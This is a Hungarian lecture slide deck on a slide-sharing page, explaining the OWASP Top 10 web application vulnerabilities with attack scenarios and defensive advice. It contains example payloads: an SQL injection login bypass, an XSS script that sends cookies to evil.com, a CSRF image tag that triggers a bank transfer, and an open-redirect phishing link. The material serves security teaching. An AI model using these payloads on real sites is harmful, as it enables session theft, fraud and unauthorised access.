Azaz a 10 legkritikusabb hiba web-alkalmazásokban November 28.

Slides:



Advertisements
Hasonló előadás
MiniCRM kapcsolat bemutató
Advertisements

Adatbázis gyakorlat 1. Szerző: Varga Zsuzsanna ELTE-IK (2004) Budapest
Biztonsági tesztelési módszertanok
IMIR monitoring és információs rendszer
Hálózati és Internet ismeretek
1 Internet. 2 WWW  World Wide Web  Hivatkozásokkal összekötött hipermédia dokumentumok rendszere  Dokumentumok -> Weboldalak  A weboldalak hipertext.
IPSec.
Felhasználói felületek és üzleti logika Bollobás Dávid ASP.NET
ILBK451, 2013/2014. I. félév, ea: Kovács Zita 4.Azonosítás AZ INFORMATIKAI BIZTONSÁG ALAPJAI.
Tectia MobileID Express – Kétfaktoros erős autentikáció – 5 percen belül üzemkészen! január 16.
Teljes funkcionalitású Web kliens Kétféle felület Premium (IE6+) Light (Firefox, Safari, Opera, Netscape, IE7, IE6, IE5.5, IE5.01 és IE5.2 Mac) Eltérések.
Előadássorozat a Független Pedagógiai Intézetben fupi.hu Az internet: miért, hogyan? 6 / 10. Csada Péter Csada Bt. cspc.hu.
Cég RegisztrálásaCég Regisztrálása > 1. Lépés > 2. Lépés > 3. Lépés > 4. Lépés | Céges Felhasználó Regisztrálása > 1. Lépés > 2. Lépés > 3. Lépés > 4.
Nagy Belterület Menedzser Szoftver TDK vagy Szakdolgozat Téma Készítette: Kusper Gábor Minden jog fenntartva!
Jelszavak helyes megválasztása, szótáras törés
Az e-kereskedelem (e-business)
WEB Technológiák Dr. Pance Miklós – Kolcza Gábor Miskolci Egyetem.
WEB Technológiák Coldfusion ME Általános Informatikai Tsz. dr. Kovács László.
Előadó: Kárpáti Péter Üzleti folyamatvezérlés nagyvállalati környezetben (BizTalk Server 2004, Office InfoPath 2003 és Windows.
Egy ISA szerver naplója Sárosi György Terméktámogatási Tanácsadó Microsoft Magyarország.
WEB Technológiák ISAPI ME Általános Informatikai Tsz. dr. Kovács László.
PHP VII Sütik, munkamenetek. Sütik Mi az a süti? A süti (cookie) állapotot tárol a felhasználó böngészőjében. Pl. ha egy oldalon beállítható, hogy milyen.
FTP File Transfer Protocol. Mi az FTP? Az FTP egy olyan protokoll, amely fájlok interneten keresztül végzett átvitelére szolgál. A felhasználók többsége.
AD {RMS} Active Directory Rights Management Services
…az ISA Server 2006 segítségével Gál Tamás Microsoft Magyarország.
Hálózatkezelési újdonságok Windows 7 / R2
Exchange Server 2007 Client Access Role
2014. július Tóth Nándor, Kecskeméti Főiskola - Informatika Hálózati Csoport Hiba észlelése Hiba észlelése Bejelentés Elfelejtődik Hibakeresés,
Anyagadatbank c. tárgy gyakorlat Féléves tematika Adatbázis alapfogalmak, rendszerek Adatmodellek, adatbázis tervezés Adatbázis műveletek.
Publikációs portál Analízis modell UML bázisú modellezés és analízis Csapat: UML7 (Percze Dániel, Rajnai Zoltán, Ráth István, Tóth Dániel, Vágó Dávid)
, levelezés … kérdések - válaszok Takács Béla 2008.
a Moodle autentikációjához a PTE FEEK-en
Űrlapok és keretek.
Az internetes keresőkben a felhasználó az őt érdeklő szavakra, adatokra kereshet rá egy általában egyszerű oldalon, egy beviteli mező és egyéb szűrési.
Hálózat kiépítésével lehetőségünk nyílik más számítógépek erőforrásainak használatára. Osztott háttértár használat: egy számítógép merevlemezének megosztásával.
Felhasználók és jogosultságok
Operációs Rendszerek 1 Felhasználókezelés Windisch Gergely
Portálrendszerek és biztonság Bártházi András Első Magyarországi PHP Konferencia március 29. Copyright PHP Konferencia, 2003,
3. előadás.  Apache szerver tudnivalók  Az index.php .htaccess – web-szerverünk beállításai  Konfigurációs állományok  Adatbázis kapcsolódás beállítása.
Web Architecture. Development of Computing Architectures Monolithic mainframe programming Client Server Real Client Server Web Programming.
Műszer vezérlő - kezelő program GPI-745A teszterhez.
Az Internet alkalmazásai
Web-alapú humán lekérdező rendszer
Webprogramozó tanfolyam
Eszköz és identitás kezelés Korlátlan fájl szerver kapacitás Másodlagos adatközpont Korlátlanul skálázódó infrastruktúra Biztonságos DMZ Hibrid adat-
Webprogramozó tanfolyam
Illés Zoltán ELTE Informatikai Kar
„Ágazati felkészítés a hazai ELI projekttel összefüggő képzési és K+F feladatokra" Adatbiztonság a méréstechnológiában képzők képzése.
AAA AAA Ki, mikor, mivel, hogyan? Mit csinált, mit csinálhat, (mit fog csinálni)? Ki mihez hogyan férhet hozzá? Authentication Authorization Accounting/Audit.
A szolgáltatás technikájával – technológiájával kapcsolatos elemzések „EISZ Jövője” Konferencia június 22.
Violet nails Készítette: Csőke Vivien. Bevezetés Téma: Violet nails - műkörömkészítő weblapjának elkészítése A weboldal elérhető az alábbi címen: violetnails.atw.hu.
Adatbáziskezelés. Adat és információ Információ –Új ismeret Adat –Az információ formai oldala –Jelsorozat.
Készítette: Derecskei Nikolett
A böngészőprogram használata. A böngészők értelmezik a html nyelvet, a javascript kódokat és a php kódokat is. Majd ezeket lefuttatja, és azok alapján.
Iskolai számítógépes hálózat bővítése Készítette Tóth László Ferenc.
E LEKTRONIKUS LEVELEZÉS . E LEKTRONIKUS LEVELEZÉS Az elektronikus posta ( ) olyan rendszer, amelynek segítségével más felhasználók számára.
Felhasználók, felhasználócsoportok, jogosultságok.
Biztonság kábelek nélkül Magyar Dénes május 19.
Készítette: Somorjai Kristóf.  Az internet olyan globális számítógépes hálózat, ami az internet protokoll révén felhasználók milliárdjait kapcsolja össze.
Web alapú humán lekérdező rendszer
Bankkártya adatok kezelése
Fülemüle informatika tehetségkutató verseny
Hálózati struktúrák, jogosultságok
CONNECTRA rendszer bevezetése
Internet és kommunikáció
Internet és kommunikáció
Hozzáférés az Ügyfél portálhoz szeptember 27.
Kisvállalati hálózat kialakítása raspberry szerverrel
Előadás másolata:

Azaz a 10 legkritikusabb hiba web-alkalmazásokban 2012. November 28. OWASP TOP10 Azaz a 10 legkritikusabb hiba web-alkalmazásokban 2012. November 28.

Bemutatkozás Prém Dániel Tanszéki mérnök az Óbudai Egyetemen. Az iSec Newton Security csoport egyik vezetője. prem.daniel@nik.uni-obuda.hu

A TOP10 bemutatása A projekt célja, hogy összegyűjtse egy dokumentumba a webes alkalmazásokat érintő tíz legjelentősebb sérülékenységi fajtát és ezáltal segítséget nyújtson a szervezeteknek, hogy biztonságosabb programkódot készíthessenek. Az első lista 2003-ban látott napvilágot, majd frissítették 2004-ben, a következő kiadás 2007-ben debütált és a jelenlegi utolsó verzió 2010. április 19.-én került a nyilvánosság elé. A dokumentum eredeti nyelve angol, de lefordították francia, német, olasz, spanyol, kínai, japán, koreai, indonéz, vietnámi és héber nyelvre!

A TOP10 felhasználói U.S. Defense Information Systems Agency U.S. Federal Trade Commission Payment Card Industry (PCI) British Telecom Citibank HP IBM Global Services Symantec És még sokan mások…

A TOP10-es lista áttekintése A1: Injection A2: Cross-Site Scripting (XSS) A3: Broken Authentication and Session Management A4: Insecure Direct Object References A5: Cross Site Request Forgery (CSRF) A6: Security Misconfiguration A7: Insecure Cryptographc Storage A8: Failure to Restrict URL Access A9: Insufficient Transport Layer Protection A10: Unvalidated Redirects and Forwards https://www.owasp.org/index.php/Top_10

A1: Injection A befecskendezés lényege, hogy adatokat vagy utasításokat juttatunk be az alkalmazáson keresztül a parancsértelmezőnek SQL, LDAP, XPath, OS Shell, kódbefecskendezés, stb… Sajnos a mai napig igen elterjedt (főleg az SQL Injection) azonban elég egyszerűen elkerülhető lenne megfelelő odafigyeléssel Az elmúlt években olyan szervezetek estek áldozatul ennek a támadási formának mint a Sony, LinkedIn, eHarmony és a Yahoo

A1: Injection Hacker Hanry betölti az oldalt Majd a támadást az űrlapba beírja és beküldi a szerverre Az alkalmazás felépíti az SQL lekérdezést és továbbítja az adatbázis felé Az adatbázis lefuttatja a módosított lekérdezést és az adatokat visszaküldi az alkalmazásnak Az alkalmazás kiadja az adatokat, jóváhagyja a hozzáférést, lefuttatja az utasításokat… SELECT * FROM `users` WHERE `name` = '' OR 1=1 --' AND `pass` = ''; user #1: Kiss Béla, kiss.bela@email.hu, … user #2: Nagy Nóra, nora.nagy@webcim.hu, … … user #n: Tóth Péter, pepe@webmail.hu, …

Javaslatok: A1: Injection Alkalmazzunk megfelelő bemeneti paraméter ellenőrzést (pl.: típus, hossz, érték, stb…) Ahol csak tehetjük, alkalmazzunk White List alapú ellenőrzést a bemenő adatokon Használjunk jól bevált technikákat, mint a Prepared Statements vagy Stored Procedures A kiosztott adatbázis jogosultságot minimalizáljuk Bővebben: http://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet

A2: Cross-Site Scripting (XSS) A támadás a felhasználók böngészőjében hajtódik végre Lehet tárolt, tükrözött és DOM alapú Szinte biztosan található minden web-alkalmazásban XSS sérülékenység… Tipikusan a felhasználói munkamenet vagy érzékeny/személyes adatok megszerzésére használatos. De előfordul, hogy segítségével módosítják a weboldal tartamát, esetleg a látogatót átirányítják egy adathalász oldalra Az elmúlt időszakban olyan honlapokban találtak XSS hibákat, mint az iwiw.hu, ebay.com, cnn.com, adobe.com, amazon.com, microsoft.com, myspace.com

A2: Cross-Site Scripting (XSS) Tárolt XSS Hacker Hanry betölti az oldalt és az ártó kódját beküldi az alkalmazásnak Alice betölti az alkalmazást a tárolt kóddal együtt Alice böngészője lefuttatja a kódot és kiszolgáltatja az adatokat vagy módosítja a honlap szerkezét mivel a teljes DOM elérhető <script> document.write( ”<img src=’http://evil.com?q=” + document.cookie + ”’ alt=’’ />” ); </script> Hacker Hanry letölti a szerverről milyen adatokat gyűjtött össze…

A2: Cross-Site Scripting (XSS) Javaslatok: Ne használjuk fel (és ne jelenítsük meg) közvetlenül a felhasználók által bevitt adatokat Alkalmazzunk kimeneti kódolást (pl.: HTML entitások) minden felhasználói adatra Ha bejövő HTML adatot kell kezelni, akkor pedig minden esetben meg kell tisztítani az adatokat http://www.owasp.org/index.php/AntiSamy Bővebben: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

A3: Broken Authentication and Session Management Az alkalmazások a felhasználók hitelesítését és munkamenet kezelését gyakran nem megfelelően hajtják végre, így lehetővé teszik a támadóknak, hogy megszerezzék esetleg kitalálják a jelszavakat és munkamenet azonosítókat, vagy egyéb végrehajtási hibákat kihasználva megszemélyesítsenek egy felhasználót. A bejelentkezést sok esetben titkosított csatornán (SSL) lehet elvégezni, azonban ez sokszor nem kényszerített, tehát lehallgatható Másik alapvető hiba, hogy munkamenet azonosító védelméről is megfeledkezünk. Tudni kell, hogy kinek adtuk oda, meddig érvényes, stb… Egy hacker szemszögéből szinte lényegtelen, hogy a felhasználónév és jelszó párost szerzi meg vagy a munkamenet azonosítót, hiszen mind a kettő segítségével meg tudja személyesíteni az áldozatot Természetesen ide tartozik még a gyenge jelszó kezelés, azaz nincs minimális hossz, vagy nincs megkövetelve a jelszó komplexitás Valamint a nem kellő körültekintéssel megtervezett jelszó emlékeztető

A3: Broken Authentication and Session Management Lehallgatás: Hacker Hanry monitorozza a hálózati forgalmat www.site.com?JSESSION=93C6A... Alice bejelentkezik az alkalmazásba Hacker Hanry megszerezte Alice belépési adatait Munkamenet eltérítés: Alice munkamenetét az oldal URL-ben adja vissza Alice kattint egy linkre, amit egy bejegyzésben talált (pl.: http://www.evil.com) Hacker Hanry letölti a napló referer tartalmát Hacker Hanry megszemélyesíti Alicet a munkament birtokában

A3: Broken Authentication and Session Management Javaslatok: A beléptetés legyen egyszerű, centralizált és standardizált Ügyeljünk arra, hogy a belépési adatokat és a munkamenet azonosítót mindig SSL csatornával védjük Felejtsük el az automatizált sérülékenység vizsgálati eszközöket Ellenőrizzük az SSL tanúsítvány hitelességét és érvényességét Bizonyosodjunk meg arról, hogy a kilépés biztosan megszünteti a munkamenetet és a benne tárolt adatokat Bővebben: https://www.owasp.org/index.php/Authentication_Cheat_Sheet https://www.owasp.org/index.php/Session_Management_Cheat_Sheet

A4: Insecure Direct Object References Akkor fordul elő, amikor egy hivatkozást helyezünk el egy állományra, oldalra, könyvtárra vagy bármilyen objektumra, anélkül, hogy bármilyen hozzáférés vezérlést alkalmaznánk Ez a téma érinti a jogosultság kezelést és az A8-as URL hozzáférés korlátozásának hiányának fejezetét Gyakori hiba, hogy csak azokat a tartalmakat listázzuk, amelyhez a felhasználónak joga van. Azonban a szerver oldalon amikor a konkrét kérés végrehajtódik ezt már nem ellenőrizzük újra. Így a támadó bármikor átírja az objektum hivatkozást és olyan tartalomhoz is hozzáférhet, amelyhez normál esetben nem lenne szabad

A4: Insecure Direct Object References A felhasználó betölti a bank online felületét https://onlinebank.com/overview? acc=4056 acc=4057 Hacker Hanry észreveszi, hogy a saját azonosítója a 4057 Majd módosítja a paramétert Végül Hacker Hanry megszerzi áldozata számlaösszesítőjén található információkat

A4: Insecure Direct Object References Javaslatok: Kerüljük a Path Traversal, Local File Inclusion lehetőségét A közvetlen linkelés helyett alkalmazzunk valamilyen leképzési technikát: http://webapp.com/get?file=SecretReport.pdf http://webapp.com/get?file=C5LDJ28S832K Ellenőrizzük, hogy a paraméter megfelelő formátumú-e Minden esetben ellenőrizzük, hogy a felhasználó jogosult-e a tartalom elérésre Ügyeljünk arra is, hogy csak a megfelelő műveletet végezhesse el az adott objektummal a felhasználó (pl.: olvasás, írás, törlés) Bővebben: https://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Reference

A5: Cross-Site Request Forgery (CSRF) Ebben a támadásban a támadó ráveszi az áldozat böngészőjét, hogy egy kérést intézzen a sérülékeny alkalmazás felé Ez a módszer azért sikeres, mert a böngésző minden kéréshez elküldi az azonosítási adatokat is, mint pl.: Authentication Header, Session ID, IP cím, Windows domain creditentials, stb… Továbbá az is hozzájárul, hogy az áldozat nem lép ki az alkalmazásból Az előző két pont hatásaként a támadó olyan kéréseket indíthat a sérülékeny alkalmazás felé, amit az legitim forgalomnak fog értékelni Tipikusan arra használják, hogy átutalásokat kezdeményezzenek, esetleg zároljanak egy fiókot, vagy bizalmas adatokhoz férjenek hozzá

A5: Cross-Site Request Forgery (CSRF) Hacker Hanry elhelyezi az ártalmas kódot egy honlapon, amit az áldozati is látogat Alice meglátogatja a sérülékeny alkalmazást, viszont nem jelentkezik ki Kicsivel később Alice meglátogatja azt az oldalt, ahová Hacker Hanry beszúrta az ártalmas kódját Alice böngészője értelmezi a kódot, majd egy legitimnek tűnő kérést intéz a sérülékeny alkalmazáshoz Alice nevében, amit valójában Hacker Hanry kezdeményezett… <img src=”http://mybank.com/transfer? amount=1500&dstAcc=4057” width=”0” height=”0” />

A5: Cross-Site Request Forgery (CSRF) Javaslatok: Használjunk token rendszert, ahol érzékeny adatok feldolgozása történik, ezáltal ellehetetlenítve a támadót, hogy kérést hamisítson A tokennek kriptográfiai erősségűnek vagy randomnak kell lennie Kerüljük a token URL-be helyezését, mert a referer mezővel kiolvasható Űrlapok esetében a rejtett mező erősen javasolt Minden egyes kérésnek egyedi tokenje legyen, lehetőleg lejárati idővel Használjunk másodlagos (kétfaktoros) authentikációt az érzékeny műveletekhez Bővebben: https://www.owasp.org/index.php/CSRF_Prevention_Cheat_Sheet

A6: Security Misconfiguration Az igazi biztonság megköveteli, hogy a teljes rendszer naprakész és jól konfigurált legyen az operációs rendszertől a web és adatbázis szerveren át a teljes alkalmazásig Mindezeket a beállításokat meg kell határozni, végre kell hajtani majd folyamatosan karbantartani és ellenőrizni Fontos azt is tudni, hogy a gyártók a termékeket alapból nem a biztonságos konfigurációval látják el, hiszen akkor a használatba vétel igen nehézkes lenne. Emiatt azt későbbi beállításokkal kell megteremteni Nem szabad megfeledkezni hogy nem csak az OS-t és az alkalmazásokat kell ellenőrizni, hanem minden osztálykönyvtárat és külső modult is amelyet az alkalmazás használ

A6: Security Misconfiguration

A6: Security Misconfiguration Javaslatok: Ellenőrizni kell a beállításokat minden szinten Javasolt a Hardening Guide-ok alkalmazása Az automatizálás ezen a ponton NAGYON HASZNOS lehet Tartsuk napra késszen a rendszereket a javításokkal, nem csak az operációs rendszer és az alkalmazásokat, hanem minden osztálykönyvtárra fordítsunk kellő figyelmet Elemezzük a változások biztonsági hatását Bővebben: https://www.owasp.org/index.php/Configuration https://www.owasp.org/index.php/Testing_for_configuration_management

A7: Insecure Cryptographic Storage Elmulasztjuk meghatározni az érzékeny adatokat így általában nem a kellő körültekintéssel kezeljük őket Valamint nem figyelünk eléggé, hogy minden előfordulási helyen megfelelően kezeljük azokat Ebbe a részbe beletartozik: a gyenge titkosítás, ami miatt visszafejthető az adat a titkosítási kulcs nem megfelelő kezelése (pl.: a szalagos meghajtóra került adatokat titkosítjuk, majd a kulcs ugyan arra a szalagra kerül) a hibásan implementált jelszó kivonatok, hiszen egy sózás nélküli hash akár néhány óra alatt visszafejthető lehet a napló állományokba bekerült ellenőrizetlen adatok (pl.: a webszerver naplójába letároljuk a felhasználói jelszavakat)

A7: Insecure Cryptographic Storage Az áldozat megadja a bankkártya adatait az alkalmazásnak A hibanaplózó lementi a kérés adatait a napló állományba, mivel a Fizetési Átjáró nem elérhető Minden IT dolgozó számára elérhetőek a napló állományok a hibakeresés céljából Egy belső munkatárs máris meglovasítja a naplóban található 4 millió kártya számot…

A7: Insecure Cryptographic Storage Javaslatok: Azonosítsuk az érzékeny adatokat Azonosítsuk a helyeket ahova az érzékeny adatok kerülhetnek Védjük az adatokat és folyamatokat megfelelő titkosítással vagy kivonatolással Használjunk standard és bizonyított eljárásokat ne találjunk ki sajátot, mert az nem bizonyított A kulcsok kezelése legyen megoldva és kellő körültekintéssel kezelve Készüljünk fel kulcsserére Bővebben: https://www.owasp.org/index.php/Top_10_2007-Insecure_Cryptographic_Storage https://www.owasp.org/index.php/Guide_to_Cryptography https://www.owasp.org/index.php/Codereview-Cryptography

A8: Failure to Restrict URL Access Ez a téma kapcsolatban áll a jogosultság kezeléssel és az A4-es fejezettel, ami a nem biztonságos közvetlen objektum hozzáférés címet viselte Ez a fejezet viszont kifejezetten az alkalmazás oldalaira tér ki az URL manipulálásával Az alapvető probléma, hogy a jogosultságokat a linkrendszerbe építik bele és csak azokat a linkeket vagy menüket jelenítik meg a felhasználó számára amihez joga van, azonban ha kézzel átírja a hivatkozásokat és a szerver oldalon nem történik meg az újraellenőrzés, hogy ténylegesen jogosult-e a tartalom megtekintésére vagy módosítására…

A8: Failure to Restrict URL Access https://onlinebank.com/ admin user /overview A felhasználó betölti a bank online felületét Hacker Hanry észreveszi, hogy felhasználó szerepkörben van Majd módosítja a paramétert, ezáltal a szerepkörét Végül Hacker Hanry magasabb jogkörre tesz szert, mint alapból járna neki, így több információhoz jut hozzá

A8: Failure to Restrict URL Access Javaslatok: Minden oldalnak 3 dologra van szüksége: Ellenőrizze, hogy a felhasználó belépett-e (ha nem publikus a tartalom) Végre kell hajtani a felhasználói vagy a szerepkör alapú jogosultságkezelést Teljesen le kell tiltani a lehetőségét a jogosulatlan kérelmeknek, amelyek konfigurációs állományokra, napló fájlokra vagy forrás állományokra irányulnak Alkalmazzunk White List féle megközelítést Az automatizált eszközök itt is sokszor gyengének bizonyulnak Bővebben: https://www.owasp.org/index.php/Guide_to_Authorization https://www.owasp.org/index.php/Testing_for_Path_Traversal https://www.owasp.org/index.php/Forced_browsing

A9: Insufficient Transport Layer Protection Az alkalmazások gyakran nem hitelesítik vagy titkosítják az érzékeny adatokat a hálózati forgalomban, ezáltal sérül a bizalmasság és a sértetlenség Ha mégis, akkor előfordul, hogy gyenge algoritmusokat, érvénytelen tanúsítványokat használnak, esetleg nem megfelelően kezelik őket A támadó emiatt könnyűszerrel hozzáférhet olyan privát adatokhoz, mint az infrastruktúra elemei, operációs rendszer adatok, felhasználói azonosítók, bankkártya adatok, egészségügyi információk, pénzügyi adatok, stb… A megszerzett adatokat későbbi támadáshoz felhasználhatja, de akár a feketepiacon is eladhatja

A9: Insufficient Transport Layer Protection A külső támadó könnyedén lehallgathatja a hálózati forgalmat és megszerezheti a belépési adatokat Sok esetben csak a web szerver és a kliens közötti kapcsolat titkosított, ekkor minden gond nélkül egy belső támadó lehallgathatja az alkalmazás és a backend közötti forgalmat

A9: Insufficient Transport Layer Protection Javaslatok: Alkalmazzunk TLS kapcsolatot mindenhol, ahol érzékeny adat közlekedik Egyenként minden üzenetet titkosítsunk Digitálisan írjuk alá az üzeneteket Standard algoritmusokat használjunk Megfelelően tároljuk a kulcsokat és a tanúsítványokat Ellenőrizzük az SSL tanúsítványokat mielőtt használjuk Bővebben: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet https://www.owasp.org/index.php/Testing_for_SSL-TLS

A10: Avoiding Unvalidated Redirects and Forwards A webes alkalmazások gyakran átirányítják (Redirect) vagy továbbítják (Forward/Transfer) egy másik lapra a felhasználókat Megfelelő ellenőrzés nélkül a támadó ezt kihasználhatja és átirányíthatja a felhasználót egy adathalász oldalra De akár egy továbbítás segítségével jogosulatlan tartalomhoz is hozzáférhet a támadó, hiszen kikerülheti a hozzáférés vezérlés mechanizmusát

A10: Avoiding Unvalidated Redirects and Forwards Hacker Hanry levelet küld az Alice céges E-mail címére Alice kattint a linkre, mivel megbízik benne, hiszen jó domain névre mutat Az alkalmazás nem ellenőrzi a redirect paramétert tehát szól Alice böngészőjének, hogy átirányítja a következő lapra, ami jelen esetben egy adathalász oldal Alice böngészője betölti az adathalász oldalt From: noreply@nav.hu To: alice@cegem.hu Subject: Nem várt adó visszatérítés A nyilvántartásunk szerint Önnek lehetősége van adó visszatérítést igényelnie! A folyamat elkezdéséhez kérjük kattintson ide. http://nav.gov.hu/ado?ev=2012 &...&redirect=www.adathalasz.hu Alice megbízik az adathalász oldalban, hiszen az előbb ellenőrizte az címet és kinézete is megegyezik az eredetivel

A10: Avoiding Unvalidated Redirects and Forwards Javaslatok: Minimalizáljuk az átirányítások számát az alkalmazásban Ha alkalmazzuk, akkor kerüljük a felhasználói paraméterben megadható átirányításokat Ha elkerülhetetlen a paraméteres átirányítás akkor mindig ellenőrizzük, hogy a felhasználó jogosult-e az átirányított oldalt elérni Külső átirányítás esetén ellenőrizzük, hogy a cél szerepel-e a fehérlistán Bővebben: https://www.owasp.org/index.php/Open_redirect

Hogyan lehet megoldani ezeket a problémákat? Fejlesszünk biztonságos kódot OWASP’s Guide to Building Secure Web Applications http://www.owasp.org/index.php/Guide OWASP’s Application Security Verification Standard http://www.owasp.org/index.php/ASVS OWASP’s Enterprise Security API http://www.owasp.org/index.php/ESAPI Ellenőrizzük az alkalmazást Legyen egy szakértői csoport aki átnézi az alkalmazást OWASP's Code Review Guide http://www.owasp.org/index.php/Code_Review_Guide OWASP's Testing Guide http://www.owasp.org/index.php/Testing_Guide

Köszönöm a figyelmet

Visszajelzés: Adatvédelmi irányelvek Visszajelzés
Projectumról: SlidePlayer Felhasználási feltételek

© 2024 SlidePlayer.hu Inc. All rights reserved.